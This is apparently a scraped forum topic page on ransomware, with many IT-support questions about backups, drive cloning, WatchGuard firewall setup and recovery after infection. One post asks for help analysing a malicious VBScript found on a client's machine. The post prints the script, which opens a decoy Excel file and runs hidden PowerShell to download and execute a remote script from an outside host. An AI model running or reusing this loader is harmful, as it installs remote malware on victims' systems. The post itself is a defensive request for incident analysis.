Ransomware

155 Solutions, 384 Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.

What is the best free way to clone a hard drive (moving to SSD)?

With a boot disk, so I don't need to install anything on Windows.
0
Had a Vista PC brought in to me today, with a scareware remote story. The computer is LOCKED (Pictures attached). Drive was pulled and no virus/malware/rootkit found. Ctrl+Alt+Del allows me to open task manager, but I cannot actually do anything with it. The mouse is constrained to the middle of the screen away from Task Mgr, and keyboard input closes everything immediately and then reopens the locked password request. No actual Ransomware is found on the computer asking for money or providing a phone number or e-mail. No change when logging into Safe Mode of any flavor. Replacing registry from regback didn't solve it.
0
Hi,

I used to use this Acronis Drive Monitor free software for a SATA drive (the name of the file is ADM_en-us.exe).
The Lenovo T470 has an mSATA drive; I tried to use the above software for the Lenovo T470, but it did not work.

Question: Is there free software for an mSATA drive monitor, please?

Thanks,
tjie
0
Hello all,

I am the owner of a small business in my town. I got infected by ransomware with the .rapid extension; he wants a big ransom that I can't pay.
Is there any solution for this version? Please help.
0
I have Acronis for backups to tape. I want to be able to back up the "System State" of my DC. What files or folders do I need to make sure get backed up?
0
I had this question after viewing Watchguard Firewall xFlow Configuration.
0
Can anyone identify which encrypted ransomware renames the files to *.ZEUS? Does anyone know if there is a decrypter?
0
What are the best practices in light of ransomware attacks? I've had a few local non-rotating backups get bricked because of ransomware. I do have remote backup, but is everyone resorting to rotating backup drives?
0
I have a server and backup drive that got hit with Globeimposter 2.0 via a brute-force remote desktop attack. Nothing is salvageable, but I can still access Active Directory users. Is there any way to export, manually back up critical files to recover Active Directory in a new install?
0
We have an SBS2008 server that had recently been affected by malware.
Our Webroot antivirus program saw it and deleted it.
Now the server backup will not run.
It still shows in Windows features as being installed, but there is no block level backup in services.

Would removing the feature and adding it back fix this issue, or do you think it's something bigger that would need Microsoft support involved?
0
Has anyone used Acronis Server Backup 12.5 (or any server backup) to an AWS S3 cloud storage? Does AWS accept FTP or SFTP connections to S3 Storage?
It seems their cloud storage is priced well. $276/yr for a TB. Any comments to cloud storage in general for backups?
0
We are deploying Windows 10 workstations using True Image. I want to set the browser default to IE, and the PDF default to Adobe.
The 2 methods I researched are below. In your opinion, should I build the defaults into the image, or just use GPO?
Also, if I choose to build the defaults into the image, will the OSD method work with Acronis True Image? Or will I have to implement this a different way?


http://ccmexec.com/2015/09/making-ie-the-default-browser-in-windows-10-during-osd/

https://social.technet.microsoft.com/Forums/en-US/eb905851-b27f-4330-aa10-d7165c7a521f/switching-pdf-opening-from-edge-for-all-users?forum=win10itprogeneral
0
We have been hit with ransomware.  Please see the attached screenshot.

The file extensions have been changed to STG.

They hacked into the network, created admin users and made them part of the Admin group, created shares etc.
0
I have a machine, well, a user's profile, infected with Nozelesn ransomware. Is there any way to clean it?
0
Customer has a WatchGuard T10 Firebox firewall for a POS system. The POS server connects directly to the trusted network port. No other computers connect to that network.

Customer wants to set up an access point for WiFi. The WatchGuard has a 3rd port. I want to activate it as a second network and allow wireless devices to access the internet.

The WatchGuard firewall does not have built-in WiFi. We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant; there are no office PCs or network printers.

Need suggestions on policies. The device has content filter subscriptions. I want to enforce them on the 3rd port too, if possible.
0
We believe a client has been hacked but can't determine what the VBScript is doing to the data; it doesn't look like ransomware.
Can you help point us in a direction as to what degree this hack could be?

Below is the VBScript and a picture of a folder it has been found in. You will see that the actual Excel doc has been hidden and a fake Excel doc is in its place. It looks like when the fake Excel doc is run, it opens up the VBScript and the hidden Excel doc.

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use those object-groups to block any UDP traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
Are 32 bit computers at a higher risk of Anti-Virus, Malware or Ransomware infections?

We have a few left and I need to know if I should trash them ASAP.
0
Long story short - My client did not agree to an end to end backup solution and lost everything to ransomware.

Situation:
-Client has 1 PowerEdge R710 that I will be rebuilding with Server 2016 Datacenter. I plan on two VMs, one for the DC and one for a file server.
-The client only has roughly 100GB of live data, so retention is flexible.
-The client has about 10 workstations; I'm thinking about using Synology Cloud Station for local file backup on the workstations.
-The client is now letting me acquire 2x Synology NAS devices (DS718+)
-The client is still not willing to pay for a well-known 3rd party solution like Datto/Veeam etc. *sigh*
-I do have an existing license for Altaro that I may as well use


Question:

Since I am starting from scratch, with more hardware, I have an opportunity to be a little more creative.

Getting a backup done via Windows, Altaro, and/or Synology "Active Backup" is straightforward enough. How to be sure I am protecting the client from ransomware to the best of my ability is where I would like some advice.

One NAS will be off-site storage. For the on-site NAS, should I set up an iSCSI drive with security on the Host Server? What other security concerns can I be sure to cover ahead of time as far as accessing and storing these backups?

I know the NAS has its own built in accounts which I'm guessing will protect the offsite backups from credentials being compromised.
0
I'm trying to connect a WatchGuard T30 to an AP320 through a Cisco Catalyst 2960.

I'm able to set up trunking on the Cisco so that I can see the AP320 through the controller; however, when I connect to the WLAN I get no DHCP address, and I can't get online even when I hard code the IP. Based on some logging information I've seen on the WatchGuard, it almost looks as though the Cisco switch is sending packets to the wrong gateway address.

It looks like when a device was requesting an IP on the VLAN 192.168.5.1/24 subnet, that request was sent to the LAN 192.168.1.1 gateway.

I'm extremely new to Cisco so it's entirely possible I'm missing something obvious, but when the VLANs are set up on the router and then trunking is configured for those VLANs on the Cisco, is there a place where you need to specify what gateway to use for each trunk?
0
We have a WatchGuard M200 firewall on which we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps, but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the full 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I'm trying to use the program by James-Gourley to decrypt a 1.4.0.0 version of Cryakl. Some files are decrypted correctly, and other files are not decrypted, with an "encryption signature mismatch" message. Help me please. Sample files: https://dropmefiles.com/769Q7 More examples of unencrypted files: https://dropmefiles.com/CZ7xH
0
Good day -
I have an NTFS volume from a failed Server 2003 (not a typo). The volume was RAID1 and a member file server.

NTFS permissions are keeping me from accessing previous versions, although I can see the previous versions through Explorer.

Any tools you can think of, or am I dreaming?
0
After being hit with Ransomware, restoring from backup, and reinstalling applications as needed, I can't get the Quickbooks Database Server services started or the Quickbooks Database Server Manager to run. When I browse for files and "Start Scan", it attempts to start the services after browsing the files, finding Quickbooks files. It claims the folder in which the company files live isn't shared. I guess that's technically true, but the directory one level up IS shared, so it's possible to browse to it from a network share. Then it tells me it is attempting to resolve networking issues, and tells me after that to resolve network issues and try again later (not the exact syntax, obviously).

I have tried installing just the bare server (what we had done in the past), installing the full version of Quickbooks (2016 for the moment), uninstalling, rebooting the server (2008 R2), reinstalling just the database server, using the Quickbooks clean boot utility, and disabling ALL firewalls (Kaspersky and Windows Firewall). I can't get the QBDbMgrN to start and stay started. I can't get the QuickbooksDB26 started. For some reason it claims to be a service that should be started manually. I don't recall that having been the case in the past. Also, I don't think the QuickbooksDB26 ever disappeared, even after a clean install (using the Clean Install tool), an uninstall, and/or a reboot.

Previous to the ransomware, the server had Quickbooks 2015 and 2017 database servers installed. …
0
I currently have a WatchGuard Firebox in place and have recently purchased a Cisco Catalyst 2960 to serve as our primary switch. Our WatchGuard currently manages our WAPs (also WatchGuard), which have a private and public WiFi network which is segmented through the use of VLANs.

I'm extremely new to Cisco and I'm trying to determine how I would go about configuring the ports on the switch to pass along all VLAN traffic, which should allow the WAPs to continue functioning.
0
